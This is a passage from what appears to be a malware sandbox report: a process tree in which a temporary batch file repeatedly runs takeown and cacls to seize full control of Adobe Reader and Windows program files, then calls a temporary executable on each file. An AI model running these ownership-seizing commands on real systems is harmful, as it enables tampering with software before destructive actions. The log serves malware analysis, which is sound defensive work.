    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2404
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2380
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:2440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    - Modifies file permissions
    PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:2572
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:2556
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:2528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    - Modifies file permissions
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:2632
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:2660
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:2756
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:2716
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:2672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:624
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:1964
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:428
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:2636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:2820
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:2840
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:2832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:268
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:2912
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:1768
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:2780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:2060
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:1600
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:2996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    - Modifies file permissions
    PID:3028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:3068
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:2152
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:2076
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    - Modifies file permissions
    PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:2140
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:1552
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:2172
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:2320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:2364
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:2292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:2360
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:2344
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:2536
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:2432
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2492
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:2624
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:2724
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:2732
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:2792
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:660
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:1252
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:1168
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:1188
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:1280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    - Modifies file permissions
    PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:1724
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:564
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:2820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:2812
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2808
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2908
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1336
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:2952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2880
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3052
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
